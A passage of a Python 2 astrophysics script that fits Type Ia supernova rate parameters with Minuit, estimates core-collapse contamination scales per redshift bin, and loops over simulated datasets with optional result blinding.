{0}".format(round(lamChi2Dump(self.k, self.Beta)[0], 4)) self.chi2 = fmin.fval print "Chi2final? = {0}".format(round(fmin.fval, 4)) if not(self.priorRate is None): ratePriorFinalVal = ratePrior(self.k*self.MCK, self.Beta+self.MCBeta, self.priorRate, self.priorZEff, self.ratePriorErrUp, self.ratePriorErrDown, self.ratePriorErrAll ) c2NoPrior = chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, self.k, self.Beta, dump = False, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC) print "RATE PRIOR FINAL" print ratePriorFinalVal print "Chi2final? = {0}".format(round(fmin.fval, 4)) print "Chi2FinalNoPrior" print c2NoPrior #fJs = np.ones(zCenters.shape) ''' try: if (Rate_Model != 'discrete'): plt.clf() MinObj.draw_contour('k','Beta', nsigma=3) plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName)) if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) plt.xticks(labels) locs, labels = plt.yticks() labels = locs + np.cos(cosVal) plt.yticks(labels) plt.clf() #xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0) #fig, ax = plt.subplots(1) #plt.clf() #CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0]) #ax.clabel(CS, fontsize=7, inline=1) #ax.set_xlabel('k') #ax.set_ylabel('Beta') #if Blind: # ax.set_xticklabels([]) # ax.set_yticklabels([]) #plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName)) #plt.close() except: print "Plot Fail A" try: if (Rate_Model != 'discrete'): plt.clf() MinObj.draw_profile('Beta', text = False) if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) plt.xticks(labels) plt.savefig('{0}_{1}_beta_contour.png'.format(self.realName, self.simName)) plt.clf() except: print "Plot Fail C" try: if Rate_Model != 'discrete': Betas = np.linspace(self.Beta - 0.5, self.Beta + 0.5, 51) FCNs = [] for bTemp in Betas: FCN = lamChi2( self.k, bTemp) FCNs.append(FCN) plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour') plt.legend() plt.xlabel('Beta') plt.ylabel('Chi2') if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) plt.xticks(labels) plt.savefig('{0}_{1}_beta_mycontour.png'.format(self.realName, self.simName)) plt.clf() except: print "Plot Fail D" if Rate_Model != 'discrete': plt.clf() ax = plt.axes() Betas = np.linspace(self.Beta - 0.1, self.Beta + 0.1, 501) FCNs = [] for bTemp in Betas: FCN = lamChi2( self.k, bTemp) FCNs.append(FCN) plt.plot(Betas, FCNs, c = 'k', label = 'Non Minuit Contour') plt.legend() plt.xlabel('Beta') plt.ylabel('Chi2') if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) ax.set_xticklabels(labels) print "FCNs" print FCNs plt.savefig('{0}_{1}_beta_myzoomcontour.png'.format(self.realName, self.simName)) plt.clf() plt.clf() ax = plt.axes() ks = np.linspace(self.k - 0.1, self.k + 0.1, 501) FCNs = [] for kTemp in ks: FCN = lamChi2( kTemp,self.Beta) FCNs.append(FCN) plt.plot(ks, FCNs, c = 'k', label = 'Non Minuit Contour') plt.legend() plt.xlabel('k') plt.ylabel('Chi2') print "FCNs" print FCNs plt.savefig('{0}_{1}_k_myzoomcontour.png'.format(self.realName, self.simName)) plt.clf() df = np.array(FCNs[1:]) - np.array(FCNs[:-1]) inds = np.where(df > 0)[0] print 'inds' print inds print inds < 250 print np.where(inds < 250) inds = inds[np.where(inds < 250)] print 'inds' print inds print "INDSSHAPE" print inds.shape if inds.shape[0]: print "MINUIT IS PROBABLY MAD. HERES WHY" print inds print Betas[inds] if inds.shape[0] > 1: inds = inds[-1] print inds print Betas[inds] lamChi2Dump(self.k, Betas[inds -3]) print "MINUIT MAD 2" lamChi2Dump(self.k, Betas[inds -2]) print "MINUIT MAD 3" lamChi2Dump(self.k, Betas[inds -1]) print "MINUIT MAD 4" lamChi2Dump(self.k, Betas[inds]) print "MINUIT MAD 5" lamChi2Dump(self.k, Betas[inds + 1]) print "MINUIT MAD 6" lamChi2Dump(self.k, Betas[inds + 2]) print "MINUIT MAD 7" lamChi2Dump(self.k, Betas[inds + 3]) print "END MINUIT MAD" try: if (Rate_Model != 'discrete'): plt.clf() MinObj.draw_mncontour('k','Beta', nsigma=3) plt.savefig('{0}_{1}_k_beta_mncontour.png'.format(self.realName, self.simName)) if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) plt.xticks(labels) locs, labels = plt.yticks() labels = locs + np.cos(cosVal) plt.yticks(labels) plt.clf() MinObj.draw_mnprofile('Beta', text = False, subtract_min = True) if Blind: locs, labels = plt.xticks() labels = locs + np.cos(cosVal) plt.xticks(labels) plt.savefig('{0}_{1}_beta_mncontour.png'.format(self.realName, self.simName)) plt.clf() #xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0) #fig, ax = plt.subplots(1) #plt.clf() #CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0]) #ax.clabel(CS, fontsize=7, inline=1) #ax.set_xlabel('k') #ax.set_ylabel('Beta') #if Blind: # ax.set_xticklabels([]) # ax.set_yticklabels([]) #plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName)) #plt.close() except: print "Plot Fail B" pass #plt.axhline(y = self.MCBeta, c = 'k', label = 'True Beta') #plt.axhline(y = Beta + self.MCBeta, c = 'g', label= 'Best Fit Beta') #plt.axvline(x = k, label = 'Best Fit k') ''' ''' def chi2V2(self, fJs, fJErrs, zCenters, k, Beta): fitfJs = k*(1+zCenters)**Beta Chi2Temp = 0 for fJ, fitfJ, fJErr in zip(fJs, fitfJs, fJErrs): Chi2Temp += (fJ - fitfJ)**2/(fJ + fJErr) return Chi2Temp ''' def weakPrior(value, priorTuple): if value < priorTuple[1]: if value > priorTuple[0]: return 1 else: return (value - priorTuple[0])**4 else: return (value - priorTuple[1])**4 def ratePrior(fitK, fitBeta, priorRate, zEffPrior, priorRateErrUp = None, priorRateErrDown = None, priorRateErrAll = None): print "PRIOR" print priorRate print zEffPrior print priorRateErrUp print priorRateErrDown print "Fit Beta/k" print fitBeta print fitK fitRate = fitK*(1+zEffPrior)**fitBeta print 'Fit Rate' print fitRate print "PriorChi2" if fitRate > priorRate: if not (priorRateErrUp is None): print (fitRate - priorRate)**2/priorRateErrUp**2 return (fitRate - priorRate)**2/priorRateErrUp**2 else: print (fitRate - priorRate)**2/priorRateErrAll**2 return (fitRate - priorRate)**2/priorRateErrAll**2 else: if not (priorRateErrDown is None): print (fitRate - priorRate)**2/priorRateErrDown**2 return (fitRate - priorRate)**2/priorRateErrDown**2 else: print (fitRate - priorRate)**2/priorRateErrAll**2 return (fitRate - priorRate)**2/priorRateErrAll**2 def getCCScale(simCat, dataCat, MURESWindow = (-1, 1), zbins = [0.0, 0.3, 0.6, 0.9, 1.2], Beta = None, binList = None, fracCCData = None, outfilePrefix = 'Test', Rate_Model = 'powerlaw', f_Js = None, returnHist = False, debug = False, simInd = 100, ztype = 'zPHOT'): #import iminuit as iM #from iminuit import Minuit as M if debug: print "Check this" print Rate_Model print f_Js print Beta print fracCCData print "Done Checking" CCScales = [] CCScaleErrs = [] simIaHists = [] simCCHists = [] dataHists = [] if not(f_Js is None): f_Js = np.array(f_Js) allSimCC = simCat[simCat['SIM_TYPE_INDEX'].astype(int) != 1] allSimIa = simCat[simCat['SIM_TYPE_INDEX'].astype(int) == 1] allData = np.copy(dataCat) #fnorm2 = float(dataCat.shape[0])/float(np.sum(simHist)) simCat = simCat[(simCat['MURES'] < MURESWindow[0]) | (simCat['MURES'] > MURESWindow[1]) ] dataCat = dataCat[(dataCat['MURES'] < MURESWindow[0]) | (dataCat['MURES'] > MURESWindow[1]) ] for zl, zh in zip(zbins[:-1], zbins[1:]): tempSim = simCat[(simCat[ztype] < zh) & (simCat[ztype] > zl)] tempData = dataCat[(dataCat[ztype] < zh) & (dataCat[ztype] > zl)] allSimCCZbin = allSimCC[(allSimCC[ztype] < zh) & (allSimCC[ztype] > zl)] allSimIaZbin = allSimIa[(allSimIa[ztype] < zh) & (allSimIa[ztype] > zl)] if debug: print "all Sim CC Zbin/IaZbin" print allSimCCZbin.shape[0] print allSimIaZbin.shape[0] allDataZbin = allData[(allData[ztype] < zh) & (allData[ztype] > zl)] tempSimCC = tempSim[tempSim['SIM_TYPE_INDEX'] != 1] tempSimIa = tempSim[tempSim['SIM_TYPE_INDEX'] == 1] R = float(tempData.shape[0])/float(allDataZbin.shape[0]) if debug: print "R" print R print "Hist CC, outlier and total" print tempSim.shape[0] print allSimCCZbin.shape[0] print "pre Beta Correction allSimIa" print tempData.shape[0] print allSimIaZbin.shape[0] if Rate_Model == 'discrete': hist, bins = np.histogram(allSimIaZbin[ztype], bins = 11) if debug: print 'fJ shape' print f_Js.shape print f_Js print hist print bins betaCorrAllSimIaZbin =np.sum(hist*f_Js) else: betaCorrAllSimIaZbin =np.sum((1+ allSimIaZbin[ztype])**Beta) #S = float(np.array(R*histSAllIa) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*histSAllCC)) try: if debug: print "Test S" print R print betaCorrAllSimIaZbin print tempSimIa.shape[0] print tempSimCC.shape[0] print allSimCCZbin.shape print 'EEE' print np.array(R*betaCorrAllSimIaZbin) print 'DDD' print np.array(tempSimIa.shape[0]) print 'CCC' print (np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0])) print "AAA" print (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0])) print "BBB" #S = (np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0])) S = float(np.array(R*betaCorrAllSimIaZbin) - np.array(tempSimIa.shape[0]))/float(np.array(tempSimCC.shape[0]) - np.array(R*allSimCCZbin.shape[0])) except: S = np.nan if debug: print "S WTF" print S print "Uncertainty Related Bullshit" ''' print "Delta R" dR = np.sqrt(histD + histDAll) print dR num1 = np.sqrt(np.sqrt((dR/R)**2 + histSAllIa) + tempSimIa.shape[0]) num2 = np.sqrt(np.sqrt((dR/R)**2 + histSAllCC) + tempSimCC.shape[0]) den1 = (R*histSAllIa - tempSimIa.shape[0]) den2 = (tempSimCC.shape[0] - R*histSAllCC) dS = np.sqrt((num1/den1)**2 + (num2/den2)**2) ''' #ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - histSAllIa*R)/(tempSimCC.shape[0] - R*histSAllCC)**2 #ddNCC = np.sqrt(histSAllCC)*R*(histSAllIa*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2 #ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC) #ddNIa = np.sqrt(histSAllIa)*R/(tempSimCC.shape[0] - R*histSAllCC) ddnCC = np.sqrt(tempSimCC.shape[0])*(tempSimIa.shape[0] - allSimIaZbin.shape[0]*R)/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2 ddNCC = np.sqrt(allSimCCZbin.shape[0])*R*(allSimIaZbin.shape[0]*R - tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0])**2 ddnIa = np.sqrt(tempSimIa.shape[0])/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0]) ddNIa = np.sqrt(allSimIaZbin.shape[0])*R/(tempSimCC.shape[0] - R*allSimCCZbin.shape[0]) #ddR = (histSAllIa*tempSimCC.shape[0] - histSAllCC * tempSimIa.shape[0])/(tempSimCC.shape[0] - R*histSAllCC)**2 dS = np.sqrt(ddnCC**2 + ddNCC**2 + ddnIa**2 + ddNIa**2)# + ddR**2) if debug: print "ddnCC" print ddnCC print "ddNCC" print ddNCC print "ddnIa" print ddnIa print "ddNIa" print ddNIa #print "ddR" #print ddR print "Delta S" print dS #assert(S > 0) if S < 0: S = np.nan if np.isnan(S): print 'SCALE IS NAN' if len(CCScales) > 0: #CCScales.append(CCScales[-1]) CCScales.append(1.0) else: CCScales.append(1.0) else: CCScales.append(S) if type(dS) == np.ndarray: if np.isnan(dS[0]): CCScaleErrs.append(1.0) else: CCScaleErrs.append(dS[0]) else: if np.isnan(dS): CCScaleErrs.append(1.0) else: CCScaleErrs.append(dS) #if debug: # print "CC PlotDebug" # print (simBinsCC[1:] + simBinsCC[:-1])/2.0 # print simHistCC # print CCScales[0] # print dS # print fnorm2 # print histD # print (muresBins[1:] + muresBins[:-1])/2.0 #if simInd ==1: # plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, simHistCC*fnorm2, c = 'b', where = 'mid', label = 'prescaled Sim CC') # plt.step((simBinsCC[1:] + simBinsCC[:-1])/2.0, CCScales[0]*simHistCC*fnorm2, c = 'g', where = 'post', label = 'postscaledSimCC') # plt.step((muresBins[1:] + muresBins[:-1])/2.0, histD, c = 'r', where = 'mid', label = 'data') # plt.legend() # plt.savefig(outfilePrefix + 'ScaledHist.png') # plt.clf() if debug: print "CCScaleErrs" print CCScaleErrs if returnHist: return CCScales, CCScaleErrs, simIaHists, simCCHists, dataHists return CCScales, CCScaleErrs def applyCCScale(NCC, CCScales, CCScaleErrs, datazbins = None, zbins = None): if not(zbins is None): zbins = np.array(zbins) if not (datazbins is None): datazbins = np.array(datazbins) if type(CCScaleErrs) == list: CCScaleErrs = np.array(CCScaleErrs) if type(CCScales) == list: CCScales = np.array(CCScales) print 'CCScaleErrs' print CCScaleErrs print datazbins print zbins if type(CCScales) == np.ndarray: if CCScales.shape[0] == 1: NCCScaled = CCScales[0]*NCC else: if (datazbins is None) | (zbins is None): assert(0) if CCScales.shape[0] < 4: k = CCScales.shape[0] -1 else: k = 3 nancond = np.isnan(CCScales) if np.sum(nancond) > 0: CCScales[nancond] = 1. CCScaleErrs[nancond] = 1. zCenters = (zbins[1:]+ zbins[:-1])/2.0 print zCenters print CCScales #spline = UnivariateSpline(zbins, CCScales, w = 1.0/CCScaleErrs, k = k) spline = UnivariateSpline(zCenters, CCScales, w = 1.0/CCScaleErrs, k = k) print datazbins.shape print datazbins print NCC.shape datazcents = (datazbins[1:]+ datazbins[:-1])/2.0 NCCScaled = spline(datazcents)*NCC elif (type(CCScales) == int) | (type(CCScales) == float): NCCScaled = CCScales*NCC else: assert(0) NCCScaled = NCCScaled.clip(0) print NCCScaled assert(not bool(np.sum(NCCScaled < 0))) return NCCScaled if __name__ == '__main__': from sys import argv print "argv" print argv datadir = argv[1] simdir = argv[2] dataname = argv[3] print "dataname" simname = argv[4] print simname simgenfile = argv[5] print simgenfile NNCut = False cheatType = bool(int(argv[6])) cheatZ = bool(int(argv[7])) trueBeta = float(argv[8]) paramFile = argv[9] cutFiles = [argv[10]] try: debug = bool(int(argv[11])) except: debug = False #if( ('Combine' in simdir) or ('SALT2' in simdir)) & (('Combine' in datadir) or ('SALT2' in simdir)): #NNCut = True #NNProbCut = 0.95 #if len(argv) > 6: # NNCut = True # NNProbCut = 0.9 # NNData = argv[6] # NNSim = argv[7] #default params zminFit = 0.1 zmaxFit = 1.2 zminSamp = 0.1 zmaxSamp = 1.2 MJDMin = 0.0 MJDMax = np.inf bins = "equalSize" runFit = True fracContamCuts = [-1] fixBeta = True fixK = False nbins = None binList = None ScaleMuResCutLow = -1 ScaleMuResCutHigh = 1 #muresBins = 1 muresBinsLow = 3 muresBinsHigh = 3 scaleZBins = [0.0, 1.2] nScaleZBins = None cheatCCSub = False cheatCCScale = False ZSysFlag = False Blind = False Rate_Model = 'powerlaw' MURESCuts = 2.0 #[(0.0, 0.8, -0.5, 0.5), (0.8, 1.5, -1, 1)] noCCMC = False fixCCScale = False trueMCBeta = 1.65 trueMCK = 1.97E-5 priorRate = None priorZEff = None ratePriorErrUp = None ratePriorErrDown =None ratePriorErrAll = None priors = None #override file params = open(paramFile, 'r').readlines() for p in params: print p exec(p) if nScaleZBins is None : redoScaleZBinFlag = False else: redoScaleZBinFlag = True if not(priors is None): if len(priors) == 3: priorRate, priorZEff, ratePriorErrAll = priors ratePriorErrUp = None ratePriorErrDown = None elif len(priors) == 4: priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown = priors ratePriorErrAll =None cosVal = 47392945716038.134971247 kmean = [] ksigma = [] kErr = [] BetaMean = [] #BetaWeightMean = [] #KWeightMean = [] BetaSigma= [] BetaErr = [] zBreakMeans = [] zBreakSigmas =[] zBreakErrs = [] Chi2Mean = [] Chi2Sigma = [] f_JStorage = [] f_JErrStorage = [] SampleSizes = [] CCScaleStorageGlobal = [] CCScaleErrStorageGlobal = [] #MURES_Cuts = [2.0] #MURES_Cuts = [1.0, 1.5, 2.0, 3.0, 4.0, 99.0, 2.0] #for MURES_Cut in MURES_Cuts: fcc = -1 for cf in cutFiles: cuts = [] # cuts = [('FITPROB', 0.01, np.inf), ('NN_PROB_IA', NNProbCut, np.inf)] cutlist = open(cf, 'r').readlines() for l in cutlist: spl = l.split() cuts.append(('{0}'.format(spl[0]), float('{0}'.format(spl[1])), float('{0}'.format(spl[2])))) ks = [] kErrs = [] Betas = [] BetaErrs = [] zBreaks =[] zBreakErrs = [] Chi2s = [] CCScaleStorage = [] CCScaleErrStorage = [] nFail = 0 simLoaded = False #print "FUCK MPI" #if Rate_Model == 'discrete': # subprocess.call(['python', 'constructChi2Func.py', str(nbins)], shell = False) #print "MPI Fucked" if '{' in datadir: if os.path.exists(datadir.format(98)): print "MOAR SIMS" nfile = 101 else: print "FEWAR SIMS" nfile = 49 else: nfile = 2 for simInd in range(1,nfile): #print "Sim {0}".format(simInd) #SimBeta = 2.1 # simdir.split('_')[-3] #SimR0 = 1.7*10**-5 #simdir.split('_')[-5] #print "Sim R0 = {1}; Sim Beta = {0}".format(SimBeta, SimR0) print datadir.format(simInd) if simLoaded: try: RateTest.newData(datadir.format(simInd), dataname.format(simInd), simInd =simInd) if ZSysFlag: assert(0) RateTest.zSystematic(nbins = nbins, binList = binList) if redoScaleZBinFlag: RealCat = RateTest.postCutRealCat RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)] zArray =RealOutlierCat[RateTest.ztype] zArray.sort() splitZs = np.array_split(zArray, nScaleZBins) #[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]] scaleZBins = [splitZs[0][0]] for i in range(1,nScaleZBins): scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0) scaleZBins.append(splitZs[i][-1]) #RateTest.effCalc(nbins = nbins, fracContamCut = fcc, simInd =simInd) #RateTest.effCalc(nbins = 20) BetaIter = [] BetaErrIter = [] CCIter = [] CCErrIter = [] RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind) if Rate_Model != 'discrete': if Blind: print "Blinding A" BetaIter.append(RateTest.Beta+ np.cos(cosVal)) else: BetaIter.append(RateTest.Beta) BetaErrIter.append(RateTest.BetaErr) for iteration in range(nIter): if not fixCCScale: if not noCCMC: CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype) CCIter.append(CCScale) CCErrIter.append(CCScaleErr) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind) else: CCIter.append(0.0) CCErrIter.append(0.0) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind) else: CCIter.append(1.0) CCErrIter.append(0.0) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind) if Blind: print "Blinding b" BetaIter.append(RateTest.Beta+ np.cos(cosVal)) else: BetaIter.append(RateTest.Beta) BetaErrIter.append(RateTest.BetaErr) if not fixCCScale: if not noCCMC: CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype) CCIter.append(CCScale) CCErrIter.append(CCScaleErr) else: CCIter.append(1.0) CCErrIter.append(0.0) print "CCScale Progression" print CCIter print "CCScale Err Progression" print CCErrIter if Rate_Model != 'discrete': print "Beta Progression" print BetaIter print "Beta Err Progressions" print BetaErrIter print "Mean Betas" print np.nanmean(BetaIter) print "Mean CCScales" print np.nanmean(CCIter) else: f_JStorage.append(RateTest.fJList) f_JErrStorage.append(RateTest.fJErrList) #print "AAA CC Scales" if not fixCCScale: if not noCCMC: CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype) print CCScale CCScaleStorage.append(CCScale) CCScaleErrStorage.append(CCScaleErr) else: CCScaleStorage.append(0.0) CCScaleErrStorage.append(1.0) else: CCScaleStorage.append(1.0) CCScaleErrStorage.append(1.0) ks.append(RateTest.k) kErrs.append(RateTest.kErr) if Blind: print "Blinding c" Betas.append(RateTest.Beta+ np.cos(cosVal)) else: Betas.append(RateTest.Beta) BetaErrs.append(RateTest.BetaErr) if Rate_Model == 'brokenpowerlawVar': zBreaks.append(Rate_Fitter.zBreak) zBreakErrs.append(Rate_Fitter.zBreakErr) Chi2s.append(RateTest.chi2) print "CCScale Storage Iter {0}".format(simInd) print CCScaleStorage if not noCCMC: print CCScale print CCScale[0] dnamestr = datadir.format(simInd) cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz' #if saveCuts: # np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s') lowzCut = zminFit highzCut = zmaxFit SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0]) if saveCuts: np.savetxt(cutdnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt='%s') #with open(cutdnamestr, 'rb') as f_in: # with gzip.open(cutdnamestr + '.gz', 'wb') as f_out: # shutil.copyfileobj(f_in, f_out) except Exception, e: print "FAILURE" print e traceback.print_exc() nFail +=1 else: try: RateTest = Rate_Fitter(datadir.format(simInd), dataname.format(simInd), simdir, simname,simgenfile, trueMCBeta, trueMCK, zminSamp =zminSamp, zmaxSamp =zmaxSamp, zminFit =zminFit, zmaxFit =zmaxFit, cheatZ = cheatZ, cheatType = cheatType, cuts = cuts, cheatCCSub = cheatCCSub, cheatCCScale = cheatCCScale, Rate_Model = Rate_Model, MURESCuts = MURESCuts, noCCMC = noCCMC, priorRate = priorRate, priorZEff = priorZEff, ratePriorErrUp = ratePriorErrUp, ratePriorErrDown =ratePriorErrDown, ratePriorErrAll = ratePriorErrAll)# , MJDMin = 0, MJDMax = np.inf) if ZSysFlag: RateTest.zSystematic(nbins = nbins, binList = binList) simLoaded = True RateTest.effCalc(nbinsSamp = nbinsSamp,nbinsFit = nbinsFit, fracContamCut = fcc) #RateTest.effCalc(nbins = 20) BetaIter = [] BetaErrIter = [] CCIter = [] CCErrIter = [] if redoScaleZBinFlag: RealCat = RateTest.postCutRealCat RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)] zArray =RealOutlierCat[RateTest.ztype] zArray.sort() print 'zArray' print zArray print 'nScaleZBins' print nScaleZBins splitZs = np.array_split(zArray, nScaleZBins) #[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]] scaleZBins = [splitZs[0][0]] for i in range(1,nScaleZBins): scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0) scaleZBins.append(splitZs[i][-1]) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind) if Rate_Model != 'discrete': if Blind: print "Blinding d" BetaIter.append(RateTest.Beta+ np.cos(cosVal)) else: BetaIter.append(RateTest.Beta) BetaErrIter.append(RateTest.BetaErr) for iteration in range(nIter): print "interation Number" print iteration if not fixCCScale: if not noCCMC: CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype) CCIter.append(CCScale) CCErrIter.append(CCScaleErr) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind) else: CCIter.append(0.0) CCErrIter.append(1.0) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind) else: CCIter.append(1.0) CCErrIter.append(1.0) RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind) if Rate_Model != 'discrete': if Blind: print "Blinding e" BetaIter.append(RateTest.Beta+ np.cos(cosVal)) else: BetaIter.append(RateTest.Beta) BetaErrIter.append(RateTest.BetaErr) if not fixCCScale: if not noCCMC: CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype) CCIter.append(CCScale) CCErrIter.append(CCScaleErr) if Rate_Model != 'discrete': print "Beta Progression" print BetaIter print "Beta Err Progressions" print BetaErrIter print "Mean Betas" print np.nanmean(BetaIter) else: f_JStorage.append(RateTest.fJList) f_JErrStorage.append(RateTest.fJErrList) print "CCScale Progression" print CCIter print "CCScale Err Progression" print CCErrIter print "Mean CCScales" print np.nanmean(CCIter) if not fixCCScale: if not noCCMC: print "AAA CC Scales" CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, f_Js =RateTest.fJList, Rate_Model = Rate_Model, simInd = simInd, debug = debug, ztype = RateTest.ztype) print 'CC Scale' print CCScale CCScaleStorage.append(CCScale) CCScaleErrStorage.append(CCScaleErr) else: CCScaleStorage.append(0.0) CCScaleErrStorage.append(1.0) else: CCScaleStorage.append(1.0) CCScaleErrStorage.append(1.0) dnamestr = datadir.format(simInd) cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz' np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s') #with 